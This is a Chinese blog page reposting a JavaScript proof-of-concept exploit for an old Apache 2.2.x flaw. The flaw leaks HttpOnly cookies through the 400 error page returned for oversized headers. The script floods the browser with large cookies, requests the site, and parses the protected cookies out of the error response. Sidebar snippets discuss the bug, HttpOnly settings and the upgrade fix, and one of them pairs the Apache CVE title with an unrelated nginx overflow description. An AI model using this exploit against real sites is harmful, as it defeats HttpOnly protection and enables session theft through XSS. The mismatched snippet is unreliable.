apache httponly cookie disclosure

最新推荐文章于 2023-04-21 12:47:12 发布
最新推荐文章于 2023-04-21 12:47:12 发布
阅读量2.8k 收藏
点赞数
文章标签: apache cookies xmlhttprequest function date string
 
// Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
// Most browsers limit cookies to 4k characters, so we need multiple
function setCookies (good) {
    // Construct string for cookie value
    var str = "";
    for (var i=0; i< 819; i++) {
        str += "x";
    }
    // Set cookies
    for (i = 0; i < 10; i++) {
        // Expire evil cookie
        if (good) {
            var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
        }
        // Set evil cookie
        else {
            var cookie = "xss"+i+"="+str+";path=/";
        }
        document.cookie = cookie;
    }
}
function makeRequest() {
    setCookies();
    function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content
            var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
            if (content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object
                for (var i=0; i<cookies.length; i++) {
                    var s_c = cookies[i].split('=',2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            // Unset malicious cookies
            setCookies(true);
            alert(JSON.stringify(cookie_dict));
        }
    }
    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}
makeRequest();
cnbird2008
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP设置CookieHTTPONLY属性方法
10-20
当一个Cookie被设置为HTTPOnly时,JavaScript的Document.cookie API和其他通过JavaScript可以访问Cookie的方法将无法读取或修改这个Cookie。这在一定程度上降低了通过跨站脚本攻击(XSS)窃取用户Cookie的风险。 PHP...
.net 获取浏览器Cookie(包括HttpOnly)实例分享
10-26
介绍了.net 获取浏览器Cookie(包括HttpOnly)实例,有需要的朋友可以参考一下
Apache2.2.0-2.2.21 httpOnly Cookie Disclosure 测试过程
zvall的专栏
11-28 1017
Apache2.2.0-2.2.21 存在这样一个漏洞,当发送的Cookie超过 apache的LimitRequestFieldSize 4192字节(默认大小) 时会 报一个400错误,这个页面里包含着Cookie Exp: http://www.exploit-db.com/exploits/18442/ 以下是测试过程 java写的测试代码
Apache httpOnly Cookie泄露分析与测试
收集盒 Book box
05-08 7165
Apache HTTP Server 2.2.x多个版本没有正确严格限制HTTP请求头信息,HTTP请求头信息超过LimitRequestFieldSize长度时服务器返回400(Bad Request)错误,并在返回信息中将出错请求头内容爆出,攻击者可以利用该漏洞获取httponly cookies。 受影响版本: 2.2.21, 2.2.20, 2.2.19, 2.2.18, 2.2.17
Apache httponly Cookie泄露
weixin_30518397的博客
08-03 417
对于xss攻击(窃取cookie),一个有效的方式是设置httponly属性,在apache2.2.X 很多版本,当cookie过长时,将返回cookie导致cookie泄露 这个POC试验失败-_-不知道为啥 开始时不知道ajax请求如何携带cookie发送,以为还是setRequestHeader。。,后来知道为了安全取消了这样的发送行为,可以通过设置document.cookie,这样发...
【漏洞二】Apache HTTP Server "httpOnly" Cookie信息泄露漏洞
weixin_30955341的博客
09-11 1839
【漏洞】 Apache HTTP Server "httpOnly" Cookie信息泄露漏洞 【原因】 服务器问题 Apache HTTP Server在对状态代码400的默认错误响应的实现上存在Cookie信息泄露漏洞,成功利用后可允许攻击者获取敏感信息。 【解决】 升级到 Apache Httpd 2.2.22 或更高版本。update the apache...
PHP Apache 检测到会话cookie中缺少HttpOnly/Secure属性漏洞处理
u010457180的博客
04-21 2038
PHP Apache 检测到会话cookie中缺少HttpOnly/Secure属性漏洞 通过修改PHP配置文件或PHP文件解决此漏洞
httpwebreqeust读取httponlycookie方法
08-31
然而,有些Cookie被标记为`HttpOnly`,这意味着它们不能通过JavaScript等客户端脚本语言访问,以增加安全性,防止XSS(跨站脚本攻击)对Cookie的窃取。但有时开发者需要在服务器端代码中处理这些`HttpOnly` Cookie,...
cookie设置httpOnly和secure属性实现及问题
01-03
该文档整合了cookiehttponly和secure的简介,已经设置该属性时会遇到的问题,以及设置属性的方式
Apache httpOnly Cookie泄露( CVE-2012-0053)——漏洞复现
W小哥
06-16 2905
一、漏洞描述 二、漏洞原理 在1.4.7之前的nginx 1.3.15和1.5.12之前的1.5.x中的SPDY实现中,基于堆的缓冲区溢出允许远程攻击者通过精心设计的请求执行任意代码。 三、环境搭建 四、漏洞复现 五、漏洞修复 ...
Apache httpOnly Cookie 泄露漏洞修复方法
收集盒 Book box
08-10 8383
by thanks  insightlabs里看到 http://insight-labs.org/?p=267 漏洞原理分析就不多说了,文章里都有 但并未提到漏洞修补方法,正好在这做个补充。 漏洞原理和过程: 1.       受害者中了跨站,浏览器发出携带超大cookies的包 2.       服务器返回400错误,并会在respon
手动配置Apache(Http)服务
qq_57377057的博客
06-30 1095
目录前提环境: 更改公网网关 关闭防火墙 为保证正常运行还需要下载一些编译软件开始配置 1.准备好apache源码包或从网上下​2.通过rz传输到虚拟机中的 /usr/local下3.对其进行解压4. 进入httpd文件,并将其他两个依赖文件传输到软件包下,并解压5.进入到解压后的httpd的目录 /usr/local/httpd-2.4.25/,对其进行自定义编译​编辑6. 对其进行编译让系统可以识别 7、开启验证服务注意点:编译软件要安装完后再进行
cookie设置HttpOnly
零度的博客专栏
05-20 2万+
1.什么是HttpOnly?         如果cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击,窃取cookie内容,这样就增加了cookie的安全性,即便是这样,也不要将重要信息存入cookie。XSS全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所
使用HttpOnly提升Cookie安全性
热门推荐
zzzmmmkkk的专栏
09-01 9万+
在介绍HttpOnly之前,我想跟大家聊聊Cookie及XSS。 随着B/S的普及,我们平时上网都是依赖于http协议完成,而Http是无状态的,即同一个会话的连续两个请求互相不了解,他们由最新实例化的环境进行解析,除了应用本身可能已经存储在全局对象中的所有信息外,该环境不保存与会话有关的任何信息,http是不会为了下一次连接而维护这次连接所传输的信息的。所以为了在每次会话之间传递信息,
增加 cookie 安全性添加HttpOnly和secure属性
轻描淡写
10-12 5016
一、属性说明: 1 secure属性 当设置为true时,表示创建的 Cookie 会被以安全的形式向服务器传输,也就是只能在 HTTPS 连接中被浏览器传递到服务器端进行会话验证,如果是 HTTP 连接则不会传递该信息,所以不会被窃取到Cookie 的具体内容。 2 HttpOnly属性 如果在Cookie中设置了"HttpOnly"属性,那么通过程序(JS脚本、Applet等)将无法读...
Cookie设置HttpOnly,Secure,Expire属性
怀揣梦想,努力前行
05-29 8万+
eclipese中创建Web工程时,有个
Apache suEXEC Privilege Elevation / Information Disclosure
cnbird's blog
08-08 989
Apache suEXEC privilege elevation / information disclosure   Discovered by Kingcope/Aug 2013   The suEXEC feature provides Apache users the ability to run CGI and SSI programs under user IDs diff
cookie httponly
最新发布
09-29
httponly是一种cookie属性,用于限制浏览器脚本(如JavaScript)对cookie的访问。当一个cookie设置了httponly属性后,浏览器将只允许通过HTTP或HTTPS协议传输这个cookie,而不允许脚本语言(如JavaScript)读取或修改它。这个属性的作用是加强对cookie的安全性,减少被恶意脚本盗取cookie的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值